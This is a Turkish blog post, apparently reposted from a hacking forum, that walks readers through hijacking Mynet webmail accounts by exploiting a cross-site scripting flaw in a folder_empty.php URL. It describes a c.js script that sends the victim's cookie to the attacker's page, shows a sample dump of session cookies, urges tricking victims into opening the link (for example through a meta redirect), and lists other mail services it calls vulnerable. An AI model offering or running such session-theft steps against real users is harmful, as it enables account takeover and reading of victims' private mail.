Mynet Xss

Xss çılgınLığı Üst düzeylere geLdi ve Mail Hack Çok Can Yakıcı oLmaya BaşLadı. Siz Göreceğiniz Yöntem ile MyNet Email Adreslerini eLe geçirebiLirsiniz.. Nasıl Mı? Bunun İçin Zeberus arkadaşımızın NetKabus.Com da yayınladığı Dökümanı sizLerLe payLaşıyorum…


Mynetin XSS açığı Çok Var – XSS den Ziyade SQL Yuvası
Uygulamalı Gösterem Zaten Çok Kolay.Mynet Mailinizi Açın
Aşağıda Verdiğim Adresi COPY Yapın Adress Bara PASTE edin.

[html]http://webmail83.mynet.com/webmail/src/folder_empty.php?mailbox=INBOX.”>[/html]

Hı …. Baktık Alert Verdi O Zaman buradan Cookie Bakalım Bide

[html]http://webmail83.mynet.com/webmail/src/folder_empty.php?mailbox=INBOX.”>[/html]

Burda da Mailimizin Cookiesini Verdi.Bizim yapmamız Gereken Bu
Verilen Bilgiyi JavaScript Kodları İle Çalmamızdır.
Sayfaya Çıkan O Cookielere Yazılı Olarak
Ulaşabilirsek Mynet te Herhangi bi Yere (oyun-mail-bilen kazanır…vs )
Şifresiz olarak Girmemizi Sağlayabiliriz.

Dewam Edelim;

Girdiğimizde Sayfada c.js Verisi Çalışaktır – c.js nin İçinde Sayfa İle

İlgili Cookieyi Araklamak İçin Ivır Zıvırlar Var.

Bu Adrese Girdiğimizde Anormal Bi Durum Olmas , Herşey Normal
Gibidir.Kurban Cookiesinin Alındıgını Anlamayacaktır.

Adrese Girdiğimizde Daha Önceden Sayfa Çıkan Cookiesini Bilgini Kendi Sayfamıza Yazdırmış Olacaz.

[html]Cookies: prefs=c2hkPTEKc249MjAıaka9*
9kkk9MQpoZj1TTVBS
RUZfVElNRV8yNEhS8HmYYwxTEKcmNzPWRlZmF1bHQKYnVs
a29uPTUKdWk9emViZXJ1c292ZXIK;
squirrelmail_language=tr_TR;
mytag=g1xj43xc80x23DSDSp2xi6; AdHistory=17277; mynetUv=TR1159959637891556386820266; __utma=21975975.788120136.1159959649.
1159934343.116001746443.6; __utmz=21975975.1
159962570.5.5.utmccn=(ZeberuS)|utmcsr=google|utmctr=mynet|utmcmd=organic; numToCompare=116001723211696; __utmb=215
93375; __utmc=219743435; cookieControl=cooki
eControl; loginstate=6AB25EF29A952193A8005BE2A3F65D5F
MIG9BgkrBgEEAYI3WAOgga8wgawGCisGAQQBgj
dYAwGggZ0ZoCAwIAAAICZgECAUAECC2CsxEPY
woplusBBBbsqwuHkKo1GiXQ5kNGZzzBHCNLqgFr
Ze26TLU2IJJFItECg9Cl8fsEPVL0hl3
s9p3ZYplusGSRZQcPLVoJp0J5z5L29qCRp3755duI6bH7
uqCyrbSMJIJgX6AB01slashwyxXraplusYpUktmBrcRplusb
ajplusPcslashT5SpTou
7vaL0d46FbMff; mymailstate=ZeberuS=mailstatus=A&m
ailQuota=&freeMailQuota=a=ZeberuS; PHPSESSID=1e7419293716aead7d1b17333bda7[/html]

document.cookie yazıp Alert de Çıkan Bilgileri Gördüğünüz Gibi Çaldık.
Herkesin Cookie Farklı Olur Yukardaki Benim Cookie Sonra Demeyin Bu Benimkine Benzemiyor Diye.Yukardakinin Benzeri Olacaktır.

Bütn Herşeyi Yaptık Cookieyi Kendi Sayfamıza Yazdırdık.
Asıl Önemli olan Kurbana Bunu Yaptırcaz;

Burada Yapılması Gereken Şey ; Kurbanı

[html]http://webmail83.mynet.com/webmail/src/folder_empty.php?mailbox=INBOX.[/html]

Bu Adrese Sokmaktır.Yapmaya Çalıştıgımız Şey Kurbanda Bu Adresi çalıştırmaktır.Bu Adrese Girince Cookiesi Bizim Sayfamıza Yazılır.
Bu Adrese Kimse girmez Onun İçin Bu Adresi
Herhangi bi Şekilde Çalıştırmaktır..Bundan Gerisini Kendiniz Yapın.Hiç Olmassa Meta Kodu İle Bu Sireyi çalıştırın Gene Olacaktır.
Anlatım Çok kısa Çok Kolay Yapamayan olmas Sanırım.
Ben Size Myneti Verdim Çünkü Myneti Kimse Kullanmıyor.

Hotmail XSS Herkes Biliyor , Mynettte Herkes Biliyordur
Ama Cookie Çalıp Mail Giremezler.
XSS Açığı olan Mail Sitelerini Yazayım Bilginiz olsun.

Hotmail – Mynet – Linuxmail – SkyMail – HackerMail -Mail.Ru – Yahoo – AİM – Mail.com ..vs Aklıma Gelenler Bunlar..

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir